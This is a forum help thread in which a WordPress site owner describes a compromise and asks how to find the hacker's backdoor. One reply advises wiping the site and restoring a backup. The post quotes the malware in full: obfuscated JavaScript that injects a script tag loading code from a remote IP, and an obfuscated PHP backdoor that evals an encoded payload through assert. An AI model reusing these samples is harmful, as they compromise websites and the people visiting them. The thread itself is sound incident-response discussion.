Today one of our clients’ WordPress sites was hacked which is hosted with amazon aws ubuntu.
Issue is https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html
The js code is injected in all js
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80))
and in index.php
//###====###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);
$strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9vLKAbp2thpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvBQMxZGL3ZQH4LGyuLwN5LmWxAGMvZmL4MQZlMwOyZTHkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZ2MvAQqvBTLmZmyvZmuzZ2VkLJR1BGEuMwD0AGN0ZTHvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);
//###====###
Steps I follow:
- I download all js in local (using command zip -r js_files.zip
wp-content -i ‘*.js’) and replace the malicious code using sublime
text and upload this. - delete the index.php malicious code.
-
block the ip address in .htaccess
Order Deny,Allow Deny from 134.249.116.78
-
Change the permission for the folder and files (using
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/hosting-wordpress.html)
My Question is:
After doing all this, still the code is injected. How I find the back door of the hacker to the site. Please guide me.
3 Answers
With steps 1 and 2 you are only removing the symptoms of the infection, not the infection itself. Blockings access and changing permission (steps 3 and 4) makes a difference for outside approach of your system. But the infection is already inside your site. So, with these steps you do nothing to remove the infection.
The infection can be anywhere: in your theme, some plugin, hidden in the database, in WordPress core, you name it. The most fool proof way to approach this is to wipe the site entirely and install a backup. Else, you’ll have to go through a lengthy process.